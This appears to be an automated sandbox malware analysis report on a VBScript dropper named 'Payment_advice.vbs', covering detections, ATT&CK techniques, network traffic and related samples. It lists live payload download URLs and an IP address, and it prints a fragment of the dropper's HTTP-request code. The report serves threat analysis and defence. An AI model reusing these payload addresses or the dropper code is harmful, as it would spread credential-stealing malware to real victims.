Gather Victim Identity Information	221 Scripting	Valid Accounts	11 Command and Scripting Interpreter	221 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment_advice.vbs	3%	ReversingLabs	Win32.Dropper.Generic
Payment_advice.vbs	5%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
uploaddeimagens.com.br	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
https://www.google.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673	100%	Avira URL Cloud	malware
http://45.74.19.84	100%	Avira URL Cloud	malware
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	3%	Virustotal		Browse
http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg	100%	Avira URL Cloud	malware
https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673	13%	Virustotal		Browse
http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg	13%	Virustotal		Browse
http://45.74.19.84	15%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	104.21.84.67	true	false		high
uploaddeimagens.com.br	172.67.215.45	true	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://paste.ee/d/wXm0Y	false		high
https://paste.ee/d/wXm0Y	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://45.74.19.84	powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uploaddeimagens.com.br	powershell.exe, 00000004.00000002.2379468077.0000027B49F39000.00000004.00000800.00020000.00000000.sdmp	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com;	wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://paste.ee/	wscript.exe, 00000000.00000002.2006785424.000001BA6C3E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005766257.000001BA6C3E1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://paste.ee:443/d/wXm0Y	wscript.exe, 00000000.00000003.2005623172.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2612921842.000001953C315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2612921842.000001953C2F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2379468077.0000027B49B61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2612921842.000001953C342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2379468077.0000027B49B61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg	powershell.exe, 00000004.00000002.2377031114.0000027B47DD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://paste.ee/d/wXm0YPh	wscript.exe, 00000000.00000002.2006839083.000001BA6C40E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C40C000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.74.19.84	unknown	United States	29802	HVC-ASUS	true
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false
172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1391971
Start date and time:	2024-02-14 09:07:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment_advice.vbs
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winVBS@6/6@2/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 1 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4028 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:07:52	API Interceptor	2x Sleep call for process: wscript.exe modified
09:07:54	API Interceptor	96x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.74.19.84	Name.vbs	Get hash	malicious	Unknown	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg
	ODC#POX4500628950098574654323567875765674463.xla.xlsx	Get hash	malicious	AgentTesla	Browse	45.74.19.84/xampp/bkp/bkp_hta.jpg
	screen_shots.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
	Rendel#U00e9s_(PO5042208)_Az Idumont.hta	Get hash	malicious	AgentTesla	Browse	45.74.19.84/xampp/bkp/bkp_hta.jpg
	96874650.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
	182763543.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
	Encomenda_(P.O_4203445-2024)_Multi-fluido.js	Get hash	malicious	AgentTesla	Browse	45.74.19.84/xampp/bkp/js_bkp.jpg
	Yeni fatura.docx.doc	Get hash	malicious	Remcos	Browse	45.74.19.84/xampp/bkp/bkp1_vbs.jpg
104.21.84.67	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf
	182763543.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/0kkOm
	PaymentEUR41000.xls	Get hash	malicious	Remcos	Browse	paste.ee/d/oVqcS
	RFQ-#Uacac#Uc801#Uc758#Ub8b0#Uc11c-#Uacac#Uc801#Uc758#Ub8b0#Uc11c.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/6VwxD
	240202PIMXF24C.docx.doc	Get hash	malicious	Remcos	Browse	paste.ee/d/wPDYR
172.67.215.45	dereac.vbe	Get hash	malicious	Unknown	Browse
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse
	wsf.zip	Get hash	malicious	Remcos	Browse
	66432890.vbs	Get hash	malicious	Unknown	Browse
	1e#U041e.vbs	Get hash	malicious	AgentTesla	Browse
	751652433.vbs	Get hash	malicious	XWorm	Browse
	PaymentEUR41000.xls	Get hash	malicious	Remcos	Browse
	orden00878t9.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
	Purchase Order202428 (1).xls	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.ee	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	dereac.vbe	Get hash	malicious	Unknown	Browse	104.21.84.67
	Name.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	517209487.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	wsf.zip	Get hash	malicious	Remcos	Browse	104.21.84.67
	screen_shots.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	wsf.zip	Get hash	malicious	Remcos	Browse	172.67.187.200
uploaddeimagens.com.br	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	104.21.45.138
	dereac.vbe	Get hash	malicious	Unknown	Browse	172.67.215.45
	Name.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	517209487.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	wsf.zip	Get hash	malicious	Remcos	Browse	172.67.215.45
	66432890.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	87645345.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ru39M5F21m.elf	Get hash	malicious	Mirai	Browse	172.71.167.161
	Payment Slip.doc	Get hash	malicious	AgentTesla	Browse	172.67.175.19
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	SecuriteInfo.com.Win32.PWSX-gen.8372.27537.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://121202.stephene.workers.dev/?27307#toto@titi.com	Get hash	malicious	Unknown	Browse	104.21.15.191
	https://onlinestores.factorysale2023outlet.ru/?c=tasse%20kaffee%20gif	Get hash	malicious	Unknown	Browse	172.67.72.244
	RFQ.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.190.93
	mpsl-20240214-0634.elf	Get hash	malicious	Mirai, Moobot	Browse	1.13.111.35
	pF4qvp3MTb.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	172.64.41.3
	https://www.canva.com/design/DAF7gvwCDHc/view	Get hash	malicious	Unknown	Browse	104.17.239.159
HVC-ASUS	Name.vbs	Get hash	malicious	Unknown	Browse	45.74.19.84
	Mlfqslack.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	209.133.204.178
	517209487.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	45.74.19.84
	SecuriteInfo.com.Win32.PWSX-gen.18629.26158.exe	Get hash	malicious	AgentTesla	Browse	209.133.204.178
	wsf.zip	Get hash	malicious	Remcos	Browse	45.74.19.84
	ODC#POX4500628950098574654323567875765674463.xla.xlsx	Get hash	malicious	AgentTesla	Browse	45.74.19.84
	x86.elf	Get hash	malicious	Mirai	Browse	107.155.88.148
	screen_shots.vbs	Get hash	malicious	XWorm	Browse	45.74.19.84
	Rendel#U00e9s_(PO5042208)_Az Idumont.hta	Get hash	malicious	AgentTesla	Browse	45.74.19.84
CLOUDFLARENETUS	ru39M5F21m.elf	Get hash	malicious	Mirai	Browse	172.71.167.161
	Payment Slip.doc	Get hash	malicious	AgentTesla	Browse	172.67.175.19
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	SecuriteInfo.com.Win32.PWSX-gen.8372.27537.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://121202.stephene.workers.dev/?27307#toto@titi.com	Get hash	malicious	Unknown	Browse	104.21.15.191
	https://onlinestores.factorysale2023outlet.ru/?c=tasse%20kaffee%20gif	Get hash	malicious	Unknown	Browse	172.67.72.244
	RFQ.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.190.93
	mpsl-20240214-0634.elf	Get hash	malicious	Mirai, Moobot	Browse	1.13.111.35
	pF4qvp3MTb.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	172.64.41.3
	https://www.canva.com/design/DAF7gvwCDHc/view	Get hash	malicious	Unknown	Browse	104.17.239.159

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Win32.PWSX-gen.8372.27537.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.215.45
	RFQ.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	dN5bGzSKyY.exe	Get hash	malicious	Unknown	Browse	172.67.215.45
	SecuriteInfo.com.Program.Unwanted.5412.881.13731.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	172.67.215.45
	SecuriteInfo.com.Program.Unwanted.5412.881.13731.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	172.67.215.45
	dereac.vbe	Get hash	malicious	Unknown	Browse	172.67.215.45
	Name.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	pdfcentral (1).exe	Get hash	malicious	Unknown	Browse	172.67.215.45
	pdfcentral.exe	Get hash	malicious	Unknown	Browse	172.67.215.45
	rooming list.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45
a0e9f5d64349fb13191bc781f81f42e1	INV-M673778.01_CRM03283275.bat	Get hash	malicious	Remcos, DBatLoader	Browse	104.21.84.67
	GIAC-14-02-2024 704439.bat	Get hash	malicious	Remcos, DBatLoader	Browse	104.21.84.67
	EES Offer VT.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	oowDCOLXv5.exe	Get hash	malicious	LummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse	104.21.84.67
	F7uYlkAOh8.exe	Get hash	malicious	LummaC, Glupteba, Raccoon Stealer v2, SmokeLoader, Stealc	Browse	104.21.84.67
	Vxn2mDf302.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Stealc	Browse	104.21.84.67
	SecuriteInfo.com.Script.SNH-gen.13421.25283.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.84.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.84.67
	dereac.vbe	Get hash	malicious	Unknown	Browse	104.21.84.67

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.9243637703272345
Encrypted:	false
SSDEEP:	192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
MD5:	EF4099FCAB6D29945272316889156337
SHA1:	5AAFAD4581D21179B892604BEBD6038792F8CBD6
SHA-256:	A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
SHA-512:	EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulR6f1Z:NllUc
MD5:	E3A9DE2CB517872DD86F011FD073811F
SHA1:	9157E9444559E1A626DDDF9F659FF18F8BCA36F0
SHA-256:	7ABC0A81F079A37921907141B02FF0A5414B1D96B9073DE24B614D7C6996E244
SHA-512:	D50A20E5C20518F16D121057DF1935AFF3388F2A037E3B1A8AD9EB994CE2471C8B281C26E351C1BA7496DD29D43022E0AA1E6B6C547CC756CF7E96263580B5C6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................@..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4umuppxm.q5p.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5s2ehsfg.i1p.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_els0t24x.fin.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj3moqsy.1x4.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.5352186301359567
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	Payment_advice.vbs
File size:	634 bytes
MD5:	b606f1162fe532baa61cee900fd3fbaa
SHA1:	20e5c6d27e25b8a22335f524c1cbd75973783908
SHA256:	7affa68cf89e4b82d2a4736c192a6cb88452a882937fb7d7117674654c00f33a
SHA512:	811f6b4c52be82000b1e9ff0511d81d505fa01473db6530dd85098b3550b5870f152aa19842672f1af0d2b3da2b3cbdb11a872c6bc8f9dae709bd40e9245638e
SSDEEP:	12:QllOi2kX2NCpT+8B10++8B3lg7Dq8BWnxBX94sBH43F0Ff8fAlqv:QlEixK8BmqB367FBoBXa9GFf8fAlo
TLSH:	85F0C24167F94608F3F32B08957060A14E7A7F97AD2AD54E42A00D0C0EF0F848CB6B7B
File Content Preview:	..m.y.c.o.s.e. .=. . .(.I.n.t.(.(.e.s.c.i.n.t.u.r.a.-.a.l.c.a.p.a.r.r.a.r.+.1.).*.R.n.d.+.a.l.c.a.p.a.r.r.a.r.).).....S.e.t. .i.n.c.u.b.a.d.o.r. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t.t.p...W.i.n.H.t.t.p.R.e.q.u.e.s.t...5...1.".).....i.n.c.u.b.a.d.o.r

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2024 09:07:52.201654911 CET	49704	80	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.318712950 CET	80	49704	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.318846941 CET	49704	80	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.319123030 CET	49704	80	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.436042070 CET	80	49704	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.519068956 CET	80	49704	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.519098043 CET	80	49704	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.519378901 CET	49704	80	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.520745993 CET	49704	80	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.521615982 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.521656990 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.521738052 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.523782015 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.523797035 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.785763979 CET	443	49705	104.21.84.67	192.168.2.5
Feb 14, 2024 09:07:52.786041021 CET	49705	443	192.168.2.5	104.21.84.67
Feb 14, 2024 09:07:52.804500103 CET	49705	443	192.168.2.5	104.21.84.67
